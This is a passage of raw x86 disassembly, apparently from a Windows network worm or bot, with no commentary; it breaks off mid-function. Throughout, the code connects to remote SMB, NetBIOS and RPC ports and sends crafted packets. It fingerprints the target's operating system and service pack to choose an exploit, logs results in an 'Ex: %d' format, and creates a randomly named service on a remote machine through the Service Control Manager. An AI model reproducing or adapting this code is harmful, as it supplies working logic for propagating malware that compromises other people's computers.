mov eax, [ebp+var_1010]
lea eax, [eax+esi-0Ch]
mov [ebp+var_1010], eax
mov eax, [ebp+var_FA0]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FA0], eax
mov eax, [ebp+var_F9C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F9C], eax
mov eax, [ebp+var_F6C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F6C], eax
mov eax, [ebp+var_F68]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F68], eax
mov eax, [ebp+var_F50]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_E94]
lea eax, [eax+esi-0Ch]
mov esi, [ebp+var_8]
mov [ebp+var_E94], eax
lea eax, [ebp+var_20]
push eax
push esi
call dword_456EBC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4043C7
loc_4043C1: ; CODE XREF: sub_404134+2A7�j
; sub_404134+2D3�j
push esi
jmp loc_4044CB
; ---------------------------------------------------------------------------
loc_4043C7: ; CODE XREF: sub_404134+28B�j
xor ebx, ebx
push ebx
push 48h
push offset byte_43BCE8
push esi
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz short loc_4043C1
push ebx
lea eax, [ebp+var_3020]
push 1000h
push eax
push esi
call dword_456F58 ; recv
add edi, 30h
push ebx
lea eax, [ebp+var_1020]
push edi
push eax
push esi
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz short loc_4043C1
movzx eax, word_44399E
push eax
lea esi, [ebp+arg_8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
add esp, 0C8h
test eax, eax
jz short loc_4044AD
mov edx, [ebp+arg_B4]
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov eax, edx
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
shl eax, 6
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+arg_C4], ebx
mov ecx, [ecx]
jz short loc_404481
cmp [ebp+arg_BC], ebx
jnz short loc_404489
push ecx
lea ecx, [ebp+arg_8]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CE4A
mov edx, [ebp+arg_B4]
add esp, 1Ch
loc_404481: ; CODE XREF: sub_404134+321�j
cmp [ebp+arg_BC], ebx
jz short loc_4044AD
loc_404489: ; CODE XREF: sub_404134+329�j
shl edx, 6
lea eax, [ebp+arg_8]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CDD4
add esp, 1Ch
loc_4044AD: ; CODE XREF: sub_404134+2FA�j
; sub_404134+353�j
push ebx
lea eax, [ebp+var_3020]
push 1000h
push eax
push [ebp+var_8]
call dword_456F58 ; recv
push [ebp+var_8]
cmp eax, 0FFFFFFFFh
jnz short loc_4044D8
loc_4044CB: ; CODE XREF: sub_404134+28E�j
call dword_456FF0 ; closesocket
loc_4044D1: ; CODE XREF: sub_404134+40�j
; sub_404134+4A�j ...
xor eax, eax
loc_4044D3: ; CODE XREF: sub_404134+3B7�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4044D8: ; CODE XREF: sub_404134+395�j
call dword_456FF0 ; closesocket
lea eax, [ebp+arg_8]
push eax
loc_4044E2: ; DATA XREF: peei:0067C977�o
call sub_401E9E
xor eax, eax
pop ecx
inc eax
jmp short loc_4044D3
sub_404134 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044ED proc near ; CODE XREF: sub_404525+B24�p
; sub_404525+B48�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+arg_C]
test edi, edi
jle short loc_40451B
loc_4044FE: ; CODE XREF: sub_4044ED+2C�j
push [ebp+arg_C]
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+arg_8]
push eax
call sub_42A520
add esp, 0Ch
test eax, eax
jz short loc_404521
inc esi
cmp esi, edi
jl short loc_4044FE
loc_40451B: ; CODE XREF: sub_4044ED+F�j
xor al, al
loc_40451D: ; CODE XREF: sub_4044ED+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_404521: ; CODE XREF: sub_4044ED+27�j
mov al, 1
jmp short loc_40451D
sub_4044ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404525 proc near ; CODE XREF: sub_403B9B+16�p
; sub_403B9B+2B�p ...
var_263C = byte ptr -263Ch
var_243C = byte ptr -243Ch
var_243B = byte ptr -243Bh
var_243A = byte ptr -243Ah
var_143C = byte ptr -143Ch
var_1433 = dword ptr -1433h
var_1420 = dword ptr -1420h
var_141C = dword ptr -141Ch
var_1411 = word ptr -1411h
var_140D = byte ptr -140Dh
var_13FA = byte ptr -13FAh
var_13E4 = dword ptr -13E4h
var_43C = byte ptr -43Ch
var_23C = byte ptr -23Ch
var_1CC = byte ptr -1CCh
var_140 = byte ptr -140h
var_3C = byte ptr -3Ch
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_A = dword ptr -0Ah
var_6 = dword ptr -6
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 263Ch
call sub_429B60
mov eax, [ebp+arg_4]
push ebx
push esi
dec eax
push edi
jz loc_4050C0
dec eax
jz loc_40509A
dec eax
jz loc_404DD6
dec eax
jz loc_404F87
dec eax
jz loc_404DDD
dec eax
jz loc_404774
dec eax
jnz loc_404DD6
push 6
push 1
push 2
call dword_456FD0 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz loc_404DD6
xor ebx, ebx
push 10h
lea eax, [ebp+var_20]
push ebx
push eax
call sub_429760
add esp, 0Ch
mov [ebp+var_20], 2
push 8Bh
call dword_456F38 ; ntohs
push [ebp+arg_0]
mov [ebp+var_1E], ax
call sub_41E3EC
pop ecx
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
push 10h
push eax
push esi
call dword_456EBC ; connect
cmp eax, edi
jz loc_404DD6
push ebx
push 48h
push offset unk_43C298
push esi
call dword_456F8C ; send
cmp eax, edi
jnz short loc_4045E5
loc_4045DF: ; CODE XREF: sub_404525+924�j
push esi
jmp loc_404EC3
; ---------------------------------------------------------------------------
loc_4045E5: ; CODE XREF: sub_404525+B8�j
mov esi, 2000h
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F58 ; recv
cmp eax, edi
jz loc_404EC0
push ebx
push 33h
push offset dword_43C2E4
push [ebp+arg_4]
call dword_456F8C ; send
cmp eax, edi
jz loc_404EC0
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F58 ; recv
cmp eax, edi
jz loc_404EC0
push ebx
push 4Ch
push offset dword_43C318
push [ebp+arg_4]
call dword_456F8C ; send
cmp eax, edi
jz loc_404EC0
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F58 ; recv
cmp eax, edi
jz loc_404EC0
lea esi, [eax-2]
mov [ebp+arg_0], ebx
cmp esi, ebx
jle loc_404F1F
lea edi, [ebp+esi+var_243B]
loc_40467F: ; CODE XREF: sub_404525+19C�j
cmp [ebp+arg_0], 4
jge loc_404F1F
cmp [edi-1], bl
jnz short loc_4046BD
mov eax, [ebp+arg_0]
sub eax, ebx
jz short loc_4046AB
dec eax
jz short loc_4046A3
dec eax
jnz short loc_4046BA
lea eax, [ebp+var_43C]
jmp short loc_4046B1
; ---------------------------------------------------------------------------
loc_4046A3: ; CODE XREF: sub_404525+171�j
lea eax, [ebp+var_23C]
jmp short loc_4046B1
; ---------------------------------------------------------------------------
loc_4046AB: ; CODE XREF: sub_404525+16E�j
lea eax, [ebp+var_263C]
loc_4046B1: ; CODE XREF: sub_404525+17C�j
; sub_404525+184�j
push edi
push eax
call sub_42A5D0
pop ecx
pop ecx
loc_4046BA: ; CODE XREF: sub_404525+174�j
inc [ebp+arg_0]
loc_4046BD: ; CODE XREF: sub_404525+167�j
dec esi
dec edi
cmp esi, ebx
jg short loc_40467F
jmp loc_404F1F
; ---------------------------------------------------------------------------
loc_4046C8: ; CODE XREF: sub_404525+A18�j
lea eax, [ebp+var_43C]
push eax
push offset aServicePack1 ; "*Service Pack 1*"
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jz short loc_4046E3
push 7
jmp short loc_40474F
; ---------------------------------------------------------------------------
loc_4046E3: ; CODE XREF: sub_404525+1B8�j
lea eax, [ebp+var_43C]
push eax
push offset aServicePack2 ; "*Service Pack 2*"
call sub_427B4E
neg eax
sbb eax, eax
pop ecx
and eax, 2
pop ecx
add eax, 6
jmp loc_404DD8
; ---------------------------------------------------------------------------
loc_404705: ; CODE XREF: sub_404525+A1E�j
lea eax, [ebp+var_23C]
push eax
push offset aNtLanManager_ ; "NT LAN Manager *.*"
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jz loc_404F48
xor eax, eax
inc eax
jmp loc_404DD8
; ---------------------------------------------------------------------------
loc_404728: ; CODE XREF: sub_404525+A3F�j
; sub_404525+A55�j
lea eax, [ebp+var_23C]
push eax
push esi
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jz short loc_404755
lea eax, [ebp+var_43C]
push eax
push offset aWindows5_1 ; "Windows 5.1"
call edi ; dword_437178
test eax, eax
jnz short loc_404755
loc_40474D: ; CODE XREF: sub_404525+B96�j
push 3
loc_40474F: ; CODE XREF: sub_404525+1BC�j
; sub_404525+899�j ...
pop eax
jmp loc_404DD8
; ---------------------------------------------------------------------------
loc_404755: ; CODE XREF: sub_404525+214�j
; sub_404525+226�j
lea eax, [ebp+var_23C]
push eax
push offset aSamba ; "Samba *"
call sub_427B4E
neg eax
pop ecx
sbb eax, eax
pop ecx
and eax, 9
jmp loc_404DD8
; ---------------------------------------------------------------------------
loc_404774: ; CODE XREF: sub_404525+37�j
lea eax, [ebp+var_1CC]
xor ebx, ebx
push eax
push 2
mov [ebp+var_1], bl
mov byte ptr [ebp+arg_4+3], bl
call dword_4372B8 ; WSAStartup
test eax, eax
jnz loc_404DD6
push 6
push 1
push 2
call dword_4372BC ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_404DD6
push [ebp+arg_0]
mov [ebp+var_20], 2
call dword_4372C0 ; inet_addr
push 1BDh
mov [ebp+var_1C], eax
call dword_4372C4 ; ntohs
mov [ebp+var_1E], ax
lea eax, [ebp+var_20]
push 10h
push eax
push edi
call dword_4372CC ; connect
cmp eax, 0FFFFFFFFh
jz loc_404DCF
mov esi, dword_4372D0
push ebx
push 89h
push offset dword_43C3B8
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 1
jl loc_404DCF
push ebx
push 0BDh
push offset dword_43C448
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 0Ah
jle loc_404DCF
movzx eax, [ebp+var_1411]
push 1Bh
lea eax, [ebp+eax+var_140D]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_429D10
push 0Bh
lea eax, [ebp+var_3C]
push offset aWindows5_1 ; "Windows 5.1"
push eax
call sub_42A520
add esp, 18h
test eax, eax
jnz short loc_404884
mov byte ptr [ebp+arg_4+3], 1
loc_404884: ; CODE XREF: sub_404525+359�j
mov eax, [ebp+var_141C]
push 2
mov [ebp+var_6], eax
lea eax, [ebp+var_6]
push eax
push offset dword_43C528
call sub_429420
add esp, 0Ch
push ebx
push 111h
push offset dword_43C508
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 0Ah
jle loc_404DCF
push ebx
push 6Fh
push offset dword_43C620
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 0Ah
jle loc_404DCF
mov eax, [ebp+var_141C]
push 2
mov [ebp+var_6], eax
lea eax, [ebp+var_6]
push eax
push offset dword_43C6B0
call sub_429420
add esp, 0Ch
push ebx
push 3Bh
push offset dword_43C690
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 0Ah
jle loc_404DCF
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DCF
mov eax, [ebp+var_1420]
push 2
mov [ebp+var_A], eax
lea eax, [ebp+var_A]
push eax
push offset dword_43C754
call sub_429420
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43C758
call sub_429420
add esp, 18h
push ebx
push 5Fh
push offset dword_43C738
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 0Dh
jl loc_404DCF
cmp [ebp+var_1433], 0C0000022h
jnz short loc_4049D0
cmp byte ptr [ebp+arg_4+3], bl
jz short loc_4049D0
mov [ebp+var_1], 1
loc_4049D0: ; CODE XREF: sub_404525+4A0�j
; sub_404525+4A5�j
lea eax, [ebp+var_A]
push 2
push eax
push offset dword_43C6EC
call sub_429420
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43C6F0
call sub_429420
add esp, 18h
push ebx
push 60h
push offset dword_43C6D0
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 0Ah
jle loc_404DCF
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DCF
mov eax, [ebp-1412h]
push 2
mov [ebp+var_10], eax
lea eax, [ebp+var_A]
push eax
push offset dword_43C7B4
call sub_429420
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43C7B8
call sub_429420
lea eax, [ebp+var_10]
push 2
push eax
push offset byte_43C7C1
call sub_429420
add esp, 24h
push ebx
push 243h
push offset dword_43C798
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 0Ah
jle loc_404DCF
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DCF
lea eax, [ebp+var_A]
push 2
push eax
push offset dword_43C9FC
call sub_429420
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43CA00
call sub_429420
lea eax, [ebp+var_10]
push 2
push eax
push offset byte_43CA09
call sub_429420
add esp, 24h
push ebx
push 3Fh
push offset dword_43C9E0
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 0Ah
jle loc_404DCF
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DCF
lea eax, [ebp+var_A]
push 2
push eax
push offset dword_43CA3C
call sub_429420
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43CA40
call sub_429420
lea eax, [ebp+var_10]
push 2
push eax
push offset byte_43CA49
call sub_429420
add esp, 24h
push ebx
push 0A7h
push offset dword_43CA20
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 0Ah
jle loc_404DCF
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DCF
push ebx
push 3Fh
push offset dword_43C9E0
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 42h
jl loc_404DCF
cmp [ebp+var_13FA], 3
jnz short loc_404BD2
cmp byte ptr [ebp+arg_4+3], bl
jz short loc_404BD2
mov [ebp+var_1], 1
loc_404BD2: ; CODE XREF: sub_404525+6A2�j
; sub_404525+6A7�j
lea eax, [ebp+var_A]
push 2
push eax
push offset dword_43C6EC
call sub_429420
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43C6F0
call sub_429420
add esp, 18h
push ebx
push 60h
push offset dword_43C6D0
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 0Ah
jle loc_404DCF
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DCF
mov eax, [ebp-1412h]
push 2
mov [ebp+var_10], eax
lea eax, [ebp+var_A]
push eax
push offset dword_43C7B4
call sub_429420
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43C7B8
call sub_429420
lea eax, [ebp+var_10]
push 2
push eax
push offset byte_43C7C1
call sub_429420
add esp, 24h
push ebx
push 243h
push offset dword_43C798
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 0Ah
jle loc_404DCF
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DCF
lea eax, [ebp+var_A]
push 2
push eax
push offset dword_43C9FC
call sub_429420
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43CA00
call sub_429420
lea eax, [ebp+var_10]
push 2
push eax
push offset byte_43CA09
call sub_429420
add esp, 24h
push ebx
push 3Fh
push offset dword_43C9E0
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 0Ah
jle loc_404DCF
cmp byte ptr [ebp+var_1433], bl
jnz loc_404DCF
lea eax, [ebp+var_A]
push 2
push eax
push offset dword_43CAE4
call sub_429420
lea eax, [ebp+var_6]
push 2
push eax
push offset dword_43CAE8
call sub_429420
lea eax, [ebp+var_10]
push 2
push eax
push offset byte_43CAF1
call sub_429420
add esp, 24h
push ebx
push 73h
push offset dword_43CAC8
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz short loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 0Ah
jle short loc_404DCF
cmp byte ptr [ebp+var_1433], bl
jnz short loc_404DCF
push ebx
push 3Fh
push offset dword_43C9E0
push edi
call esi ; dword_4372D0
cmp eax, 0FFFFFFFFh
jz short loc_404DCF
push ebx
lea eax, [ebp+var_143C]
push 1000h
push eax
push edi
call dword_4372D4 ; recv
cmp eax, 58h
jl short loc_404DCF
cmp byte ptr [ebp+arg_4+3], bl
jz short loc_404DD6
cmp [ebp+var_13E4], 20000h
jnz short loc_404DC3
push 5
jmp loc_40474F
; ---------------------------------------------------------------------------
loc_404DC3: ; CODE XREF: sub_404525+895�j
cmp [ebp+var_1], bl
jz short loc_404DD6
push 4
jmp loc_40474F
; ---------------------------------------------------------------------------
loc_404DCF: ; CODE XREF: sub_404525+2B6�j
; sub_404525+2D3�j ...
push edi
call dword_4372D8 ; closesocket
loc_404DD6: ; CODE XREF: sub_404525+22�j
; sub_404525+3E�j ...
xor eax, eax
loc_404DD8: ; CODE XREF: sub_404525+1DB�j
; sub_404525+1FE�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_404DDD: ; CODE XREF: sub_404525+30�j
push 6
push 1
push 2
call dword_456FD0 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz short loc_404DD6
xor ebx, ebx
push 10h
lea eax, [ebp+var_20]
push ebx
push eax
call sub_429760
add esp, 0Ch
mov [ebp+var_20], 2
push 8Bh
call dword_456F38 ; ntohs
push [ebp+arg_0]
mov [ebp+var_1E], ax
call sub_41E3EC
pop ecx
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
push 10h
push eax
push esi
call dword_456EBC ; connect
cmp eax, edi
jz short loc_404DD6
push ebx
push 48h
push offset unk_43C298
push esi
call dword_456F8C ; send
cmp eax, edi
jz loc_4045DF
mov esi, 2000h
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F58 ; recv
cmp eax, edi
jz short loc_404EC0
push ebx
push 33h
push offset dword_43C2E4
push [ebp+arg_4]
call dword_456F8C ; send
cmp eax, edi
jz short loc_404EC0
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F58 ; recv
cmp eax, edi
jz short loc_404EC0
push ebx
push 4Ch
push offset dword_43C318
push [ebp+arg_4]
call dword_456F8C ; send
cmp eax, edi
jz short loc_404EC0
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F58 ; recv
cmp eax, edi
jnz short loc_404ECE
loc_404EC0: ; CODE XREF: sub_404525+D9�j
; sub_404525+F2�j ...
push [ebp+arg_4]
loc_404EC3: ; CODE XREF: sub_404525+BB�j
call dword_456FF0 ; closesocket
jmp loc_404DD6
; ---------------------------------------------------------------------------
loc_404ECE: ; CODE XREF: sub_404525+999�j
lea esi, [eax-2]
mov [ebp+arg_0], ebx
cmp esi, ebx
jle short loc_404F1F
lea edi, [ebp+esi+var_243B]
loc_404EDF: ; CODE XREF: sub_404525+9F8�j
cmp [ebp+arg_0], 4
jge short loc_404F1F
cmp [edi-1], bl
jnz short loc_404F19
mov eax, [ebp+arg_0]
sub eax, ebx
jz short loc_404F07
dec eax
jz short loc_404EFF
dec eax
jnz short loc_404F16
lea eax, [ebp+var_43C]
jmp short loc_404F0D
; ---------------------------------------------------------------------------
loc_404EFF: ; CODE XREF: sub_404525+9CD�j
lea eax, [ebp+var_23C]
jmp short loc_404F0D
; ---------------------------------------------------------------------------
loc_404F07: ; CODE XREF: sub_404525+9CA�j
lea eax, [ebp+var_263C]
loc_404F0D: ; CODE XREF: sub_404525+9D8�j
; sub_404525+9E0�j
push edi
push eax
call sub_42A5D0
pop ecx
pop ecx
loc_404F16: ; CODE XREF: sub_404525+9D0�j
inc [ebp+arg_0]
loc_404F19: ; CODE XREF: sub_404525+9C3�j
dec esi
dec edi
cmp esi, ebx
jg short loc_404EDF
loc_404F1F: ; CODE XREF: sub_404525+14D�j
; sub_404525+15E�j ...
push [ebp+arg_4]
call dword_456FF0 ; closesocket
lea eax, [ebp+var_23C]
push eax
push offset aWindowsServer2 ; "Windows Server 2003 *.*"
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jnz loc_4046C8
jmp loc_404705
; ---------------------------------------------------------------------------
loc_404F48: ; CODE XREF: sub_404525+1F5�j
lea eax, [ebp+var_23C]
mov esi, offset aWindows2000Lan ; "Windows 2000 LAN Manager*"
push eax
push esi
call sub_427B4E
mov edi, dword_437178
pop ecx
test eax, eax
pop ecx
jz loc_404728
lea eax, [ebp+var_43C]
push eax
push offset dword_43CB54
call edi ; dword_437178
test eax, eax
jnz loc_404728
push 2
jmp loc_40474F
; ---------------------------------------------------------------------------
loc_404F87: ; CODE XREF: sub_404525+29�j
push [ebp+arg_0]
mov esi, 104h
lea eax, [ebp+var_140]
xor edi, edi
push offset dword_43CB4C
push esi
push eax
xor ebx, ebx
mov [ebp+var_10], edi
call sub_429BBE
push esi
lea eax, [ebp+var_140]
push offset dword_43CB3C
push eax
call sub_4299E0
add esp, 1Ch
lea eax, [ebp+var_140]
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_4], eax
jz loc_405093
mov edi, 186A0h
push edi
call sub_4297B8
mov esi, eax
push edi
push ebx
push esi
call sub_429760
add esp, 10h
lea eax, [ebp+arg_0]
mov edi, dword_437058
push ebx
push eax
push 2710h
push esi
push 48h
push offset dword_43C208
push [ebp+arg_4]
call edi ; dword_437058
cmp byte ptr [esi+2], 0Ch
jnz short loc_405080
lea eax, [ebp+arg_0]
push ebx
push eax
push 2710h
push esi
push 18h
push offset dword_43C254
push [ebp+arg_4]
call edi ; dword_437058
cmp byte ptr [esi+2], 2
jnz short loc_405080
push 10h
push offset dword_43C270
push [ebp+arg_0]
push esi
call sub_4044ED
add esp, 10h
test al, al
jz short loc_405062
cmp [ebp+arg_0], 12Ch
sbb edi, edi
inc edi
inc edi
jmp short loc_405083
; ---------------------------------------------------------------------------
loc_405062: ; CODE XREF: sub_404525+B2E�j
push 10h
push offset dword_43C284
push [ebp+arg_0]
push esi
call sub_4044ED
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov edi, eax
jmp short loc_405083
; ---------------------------------------------------------------------------
loc_405080: ; CODE XREF: sub_404525+AFA�j
; sub_404525+B17�j
mov edi, [ebp+var_10]
loc_405083: ; CODE XREF: sub_404525+B3B�j
; sub_404525+B59�j
push esi
call sub_4298F2
pop ecx
push [ebp+arg_4]
call dword_437044 ; CloseHandle
loc_405093: ; CODE XREF: sub_404525+ABB�j
mov eax, edi
jmp loc_404DD8
; ---------------------------------------------------------------------------
loc_40509A: ; CODE XREF: sub_404525+1B�j
push 3
push 1388h
push [ebp+arg_0]
call dword_456F7C ; inet_addr
push eax
call sub_4022E7
add esp, 0Ch
test eax, eax
jz loc_404DD6
jmp loc_40474D
; ---------------------------------------------------------------------------
loc_4050C0: ; CODE XREF: sub_404525+14�j
push 6
push 1
push 2
call dword_456FD0 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz loc_404DD6
xor ebx, ebx
push 10h
lea eax, [ebp+var_20]
push ebx
push eax
call sub_429760
add esp, 0Ch
mov [ebp+var_20], 2
push 87h
call dword_456F38 ; ntohs
push [ebp+arg_0]
mov [ebp+var_1E], ax
call sub_41E3EC
pop ecx
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
push 10h
push eax
push esi
call dword_456EBC ; connect
cmp eax, edi
jz loc_4051DF
push ebx
push 48h
push offset dword_43C208
push esi
call dword_456F8C ; send
cmp eax, edi
jz loc_4051DF
mov esi, 2000h
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F58 ; recv
cmp eax, edi
jz loc_4051DF
cmp [ebp+var_243A], 0Ch
jnz short loc_4051DF
push ebx
push 18h
push offset dword_43C254
push [ebp+arg_4]
call dword_456F8C ; send
cmp eax, edi
jz short loc_4051DF
push ebx
lea eax, [ebp+var_243C]
push esi
push eax
push [ebp+arg_4]
call dword_456F58 ; recv
mov esi, eax
cmp esi, edi
jz short loc_4051DF
cmp [ebp+var_243A], 2
jnz short loc_4051DF
push 10h
push offset dword_43C270
lea eax, [ebp+var_243C]
push esi
push eax
call sub_4044ED
add esp, 10h
test al, al
jz short loc_4051BF
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_4051DF
; ---------------------------------------------------------------------------
loc_4051BF: ; CODE XREF: sub_404525+C8C�j
push 10h
push offset dword_43C284
lea eax, [ebp+var_243C]
push esi
push eax
call sub_4044ED
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_4051DF: ; CODE XREF: sub_404525+BF8�j
; sub_404525+C0F�j ...
push [ebp+arg_4]
call dword_456FF0 ; closesocket
mov eax, ebx
jmp loc_404DD8
sub_404525 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4051EF proc near ; CODE XREF: sub_40541D+412�p
var_208 = byte ptr -208h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 208h
push ebx
push esi
push edi
push 0F003Fh
push offset aServicesactive ; "ServicesActive"
push [ebp+arg_4]
call dword_456F28 ; OpenSCManagerA
xor esi, esi
mov [ebp+var_4], eax
cmp eax, esi
jz loc_405355
push [ebp+arg_10]
lea eax, [ebp+var_208]
push [ebp+arg_0]
push [ebp+arg_4]
push offset aSSS_4 ; "%s\\%s\\%s"
push eax
call sub_429B03
add esp, 14h
call sub_429B9C
push 9
pop edi
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
idiv edi
lea eax, [ebp+var_104]
push edx
push offset aDDDDD ; "%d%d%d%d%d"
push eax
call sub_429B03
add esp, 1Ch
lea eax, [ebp+var_208]
mov edi, 0F01FFh
push esi
push esi
push esi
push esi
push esi
push eax
push 1
push 3
push 20h
lea eax, [ebp+var_104]
push edi
push eax
lea eax, [ebp+var_104]
push eax
push [ebp+var_4]
call dword_456FB8 ; CreateServiceA
mov ebx, eax
cmp ebx, esi
jnz short loc_4052C1
push [ebp+var_4]
jmp loc_40534F
; ---------------------------------------------------------------------------
loc_4052C1: ; CODE XREF: sub_4051EF+C8�j
